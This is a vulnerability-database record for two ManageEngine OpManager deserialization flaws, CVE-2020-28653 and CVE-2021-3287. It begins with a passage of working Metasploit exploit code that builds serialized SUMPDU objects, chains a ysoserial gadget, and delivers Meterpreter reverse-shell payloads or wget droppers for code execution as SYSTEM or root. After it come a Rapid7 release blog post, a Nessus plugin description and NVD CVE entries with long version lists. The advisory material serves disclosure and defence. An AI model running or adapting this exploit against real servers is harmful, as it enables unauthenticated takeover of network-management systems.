'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'Type' => :nix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux',\n 'Type' => :nix_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => 'wget',\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Python',\n {\n 'Arch' => ARCH_PYTHON,\n 'Platform' => 'python',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 8060\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-07-26',\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Stability' => [ CRASH_SAFE ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'OpManager path', '/']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'data' => build_java_serialized_int(1002)\n })\n return Exploit::CheckCode::Unknown unless res\n # the patched version will respond back with 200 OK and no data in the response body\n return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?(\"\\xac\\xed\\x00\\x05\".b)\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n # Step 1: Establish a valid HTTP session\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path),\n 'keep_cookies' => true\n })\n unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/\n fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')\n end\n print_status('An HTTP session cookie 
has been issued')\n if (@vulnerability = datastore['CVE']) == 'Automatic'\n # if selecting the vulnerability automatically, use version detection\n if (version = res.body[%r{(?<=cachestart/)(\\d{6})(?=/cacheend)}]&.to_i).nil?\n fail_with(Failure::UnexpectedReply, 'Could not identify the remote version number')\n end\n\n version = Rex::Version.new(\"#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}\")\n print_status(\"Detected version: #{version}\")\n if version < Rex::Version.new('12.1')\n fail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability')\n elsif version < Rex::Version.new('12.5.233')\n @vulnerability = 'CVE-2020-28653'\n elsif version < Rex::Version.new('12.5.329')\n @vulnerability = 'CVE-2021-3287'\n else\n fail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability')\n end\n end\n\n # Step 2: Add the requestHandler to the HTTP session\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'keep_cookies' => true,\n 'data' => build_java_serialized_int(1002)\n })\n unless res&.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')\n end\n print_status('The request handler has been associated with the HTTP session')\n\n if @vulnerability == 'CVE-2021-3287'\n # need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is\n # initialized and made ready to process subsequent requests\n send_sumpdu(build_sumpdu(data: build_java_serialized_int(0)))\n end\n\n # Step 3: Exploit the deserialization vulnerability to run commands\n case target['Type']\n when :nix_dropper\n execute_cmdstager\n when :win_dropper\n execute_cmdstager\n when :win_psh\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n else\n execute_command(payload.encoded)\n end\n end\n\n def 
build_java_serialized_int(int)\n stream = Serialization::Model::Stream.new\n stream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N'))\n stream.encode\n end\n\n def build_sumpdu(data: '')\n # build a serialized SUMPDU object with a custom data block\n sumpdu = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x27\\x63\\x6f\\x6d\\x2e\\x61\\x64\\x76\\x65\".b\n sumpdu << \"\\x6e\\x74\\x6e\\x65\\x74\\x2e\\x74\\x6f\\x6f\\x6c\\x73\\x2e\\x73\\x75\\x6d\\x2e\".b\n sumpdu << \"\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x2e\\x53\\x55\\x4d\\x50\\x44\\x55\\x24\".b\n sumpdu << \"\\x29\\xfc\\x8a\\x86\\x1b\\xfd\\xed\\x03\\x00\\x03\\x5b\\x00\\x04\\x64\\x61\\x74\".b\n sumpdu << \"\\x61\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x02\\x69\\x64\\x74\\x00\\x12\\x4c\\x6a\".b\n sumpdu << \"\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\".b\n sumpdu << \"\\x4c\\x00\\x08\\x75\\x6e\\x69\\x71\\x75\\x65\\x49\\x44\\x71\\x00\\x7e\\x00\\x02\".b\n sumpdu << \"\\x78\\x70\\x7a\" + [ 0x14 + data.length ].pack('N')\n sumpdu << \"\\x00\\x0c\\x4f\\x50\\x45\\x4e\\x5f\\x53\\x45\\x53\\x53\\x49\\x4f\\x4e\\x00\\x00\".b\n sumpdu << \"\\x00\\x00\"\n sumpdu << [ data.length ].pack('n') + data\n sumpdu << \"\\x78\".b\n sumpdu\n end\n\n def send_sumpdu(sumpdu)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'),\n 'keep_cookies' => true,\n 'data' => [ sumpdu.length ].pack('N') + sumpdu\n })\n res\n end\n\n def execute_command(cmd, _opts = {})\n # An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain\n # will execute it.\n case target['Platform']\n when 'python'\n cmd.prepend('python -c ')\n when 'win'\n cmd.prepend('cmd.exe /c ')\n else\n cmd.gsub!(/\\s+/, '${IFS}')\n cmd.prepend('sh -c ')\n end\n\n vprint_status(\"Executing command: #{cmd}\")\n # the frohoff/ysoserial#168 gadget chain is a derivative of 
CommonsBeanutils1 that has been updated to remove the\n # dependency on the commons-collections library making it usable in this context\n java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)\n\n if @vulnerability == 'CVE-2020-28653'\n # in this version, the SUM PDU that is deserialized is the malicious object\n sum_pdu = java_payload\n elsif @vulnerability == 'CVE-2021-3287'\n # the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows\n # arbitrary objects to be deserialized by first sending an object of the expected type\n pdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING_ARRAY\n pdu_data << Serialization::TC_RESET\n pdu_data << java_payload.delete_prefix(\"\\xac\\xed\\x00\\x05\".b)\n sum_pdu = build_sumpdu(data: pdu_data)\n end\n\n res = send_sumpdu(sum_pdu)\n fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200\n end\nend\n", "sourceHref": "https://0day.today/exploit/36780", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-09-24T21:21:53", "description": "## Vulnerability is in the eye of the beholder\n\n\n\nExploiting firmware authored by [UDP Technology](<https://vcatechnology.com/udp-technology/>) and provided to multiple large OEMs (including Geutebruck), community contributor [TrGFxX](<https://github.com/TrGFxX>) has authored a [neat module](<https://github.com/rapid7/metasploit-framework/pull/15604>) that allows RCE as root on machines running the web interface of the Geutebruck G-Cam and G-Code products. 
For more information on the vulnerability check out the [CISA advisory](<https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03>).\n\n## OpManager exploit is OP plz nerf\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) authored a [module](<https://github.com/rapid7/metasploit-framework/pull/15670>) implementing both an [exploit](<https://attackerkb.com/topics/uFkcCFlzIW/cve-2020-28653?referrer=blog>) and [patch bypass](<https://attackerkb.com/topics/VnQHtC1Y1N/cve-2021-3287?referrer=blog>) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. This module allows payload execution as either `NT AUTHORITY\\SYSTEM` on Windows or root on Linux. On top of this new module, [zeroSteiner](<https://github.com/zeroSteiner>) made improvements to help utilize the increasingly essential [YSoSerial tool](<https://github.com/frohoff/ysoserial>). You should definitely check it out if you're interested in exploring other Java deserialization vulns.\n\n## Putting the Win in WinRM\n\nIn a big win for Metasploit, community contributor [smashery](<https://github.com/smashery>) finished off their month-long effort to get [fully functional shells working across WinRM!](<https://github.com/rapid7/metasploit-framework/pull/15632>) These new sessions support post modules, NTLMSSP authentication, and are also able to run without a payload in remote memory, making these sessions pretty hard to detect. This is a major improvement over the previous WinRM implementation that only supported execution of a single command, so huge thanks again to [smashery](<https://github.com/smashery>).\n\n## You can tell a lot about a protocol from its handshake\n\nIn one final noteworthy addition, [smashery](<https://github.com/smashery>) has once again come through with a [PR](<https://github.com/rapid7/metasploit-framework/pull/15696>) that significantly improves our RDP library. 
Metasploit users can now capture the NETBIOS computer name, NETBIOS domain name, DNS computer name, DNS domain name, and OS version from the NTLM handshake carried out over RDP, and our rdp_scanner module has been updated to display this info to all the RDP sniffers out there.\n\n## New module content (3)\n\n * [Direct windows syscall evasion technique](<https://github.com/rapid7/metasploit-framework/pull/15506>) by [Yaz](<https://github.com/kensh1ro>) \\- This adds a new evasion module that uses direct syscalls on 64-bit versions of Windows to evade detection.\n * [Geutebruck instantrec Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15604>) by [Ibrahim Ayadhi - RandoriSec](<https://twitter.com/ayadhiibrahim?lang=en>) and [Titouan Lazard](<https://twitter.com/titouanlazard?lang=en>) \\- RandoriSec, which exploits [CVE-2021-33549](<https://attackerkb.com/topics/kCZ3M8XTgH/cve-2021-33549?referrer=blog>) \\- This module exploits an unauthenticated buffer overflow vulnerability within the `action` parameter of the `/uapi-cgi/instantrec.cgi` endpoint in various Geutebruck G-Cam and G-Code devices. The exploit results in code execution as the `root` user on target devices.\n * [ManageEngine OpManager SumPDU Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15670>) by [Johannes Moritz](<https://www.radicallyopensecurity.com/our-team/pentester/JohannesMoritz.html>), [Robin Peraglie](<https://www.linkedin.com/in/robin-peraglie-aa4433161/?originalSubdomain=de>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-3287](<https://attackerkb.com/topics/VnQHtC1Y1N/cve-2021-3287?referrer=blog>) \\- The `exploit/multi/http/opmanager_sumpdu_deserialization` module implements an exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. 
Arbitrary code execution as the `NT AUTHORITY\\SYSTEM` user on Windows or the `root` user on Linux is achieved by sending a PDU to the SmartUpdateManager handler.\n\n## Enhancements and features\n\n * [#15684](<https://github.com/rapid7/metasploit-framework/pull/15684>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This improves interactive shell performance for pasted user input.\n * [#15696](<https://github.com/rapid7/metasploit-framework/pull/15696>) from [smashery](<https://github.com/smashery>) \\- This updates the RDP scanner module to extract and show additional information gathered from the NTLM handshake used for Network Level Authentication (NLA).\n * [#15632](<https://github.com/rapid7/metasploit-framework/pull/15632>) from [smashery](<https://github.com/smashery>) \\- This improves Metasploit's WinRM capabilities by allowing shell sessions to be established over the protocol. The shell sessions are interactive and are usable with post modules.\n\n## Bugs fixed\n\n * [#15600](<https://github.com/rapid7/metasploit-framework/pull/15600>) from [agalway-r7](<https://github.com/agalway-r7>) \\- This fixes an issue with encrypted payloads during session setup. 
The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.\n * [#15666](<https://github.com/rapid7/metasploit-framework/pull/15666>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue found in Meterpreter's `download` functionality where downloading a file with a name containing unicode characters would fail due to incompatible encoding.\n * [#15679](<https://github.com/rapid7/metasploit-framework/pull/15679>) from [nvn1729](<https://github.com/nvn1729>) \\- This fixes a bug where the tomcat_mgr_upload module was not correctly undeploying the app after exploitation occurred.\n * [#15686](<https://github.com/rapid7/metasploit-framework/pull/15686>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a crash in `msfrpc` that occurs due to the `exploit/linux/misc/saltstack_salt_unauth_rce` module's `MINIONS` option default being a regex instead of a string.\n * [#15695](<https://github.com/rapid7/metasploit-framework/pull/15695>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in the `exploit/unix/local/setuid_nmap` module and adds logging to print the result of the exploit's last command so the user knows what happened in the event of a failure.\n * [#15697](<https://github.com/rapid7/metasploit-framework/pull/15697>) from [smashery](<https://github.com/smashery>) \\- This updates the HTTP NTLM information enumeration module to use the `Net::NTLM` library for consistent data processing without a custom parser.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.6...6.1.7](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-15T14%3A13%3A18-05%3A00..2021-09-23T09%3A41%3A25-05%3A00%22>)\n * [Full diff 
6.1.6...6.1.7](<https://github.com/rapid7/metasploit-framework/compare/6.1.6...6.1.7>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T20:05:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653", "CVE-2021-3287", "CVE-2021-33549"], "modified": "2021-09-24T20:05:51", "id": "RAPID7BLOG:E8FC7BBDB9A9C360054240EFAF9BA636", "href": "https://blog.rapid7.com/2021/09/24/metasploit-wrap-up-131/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-29T14:50:16", "description": "The OpManager running on the remote host is affected by an 
unauthenticated remote code execution vulnerability in the Smart Update Manager (SUM) servlet.\n\nThis plugin attempts to detect the issue by sending a serialized Java object to OpManager and looking for a TCP connection initiated from the remote host to the Nessus scanner. In some environments, the TCP SYN packet may not reach the scanner due to network controls. In this case, the plugin may not detect the issue.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-04-02T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Smart Update Manager RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28653"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_CVE-2020-28653.NBIN", "href": "https://www.tenable.com/plugins/nessus/148307", "sourceData": "Binary data manageengine_opmanager_cve-2020-28653.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-18T16:31:51", "description": "Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-03T16:15:00", "type": "cve", "title": "CVE-2020-28653", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653"], "modified": "2022-04-18T15:23:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:12.5"], "id": "CVE-2020-28653", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28653", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125195:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125158:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125193:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125161:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125212:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125180:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125181:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125177:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125229:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125156:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125196:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125197:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125163:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125175:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125178:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125159:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125230:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125192:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125231:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125198:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125157:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125232:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125174:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125213:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125228:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125194:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125176:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125116:*:*:*:*:*:*"]}, {"lastseen": "2022-04-18T20:51:25", "description": "Zoho ManageEngine OpManager before 12.5.329 allows unauthenticated Remote Code Execution due to a general bypass in the deserialization class.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-22T13:15:00", "type": "cve", "title": "CVE-2021-3287", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3287"], "modified": "2022-04-18T18:13:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:12.5"], "id": "CVE-2021-3287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3287", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125193:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125159:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125233:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125196:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125230:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125174:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125180:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125121:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125156:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125161:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125163:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125232:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125178:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125157:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125181:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125192:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125194:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125198:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125137:*:*:*:*:*:*", 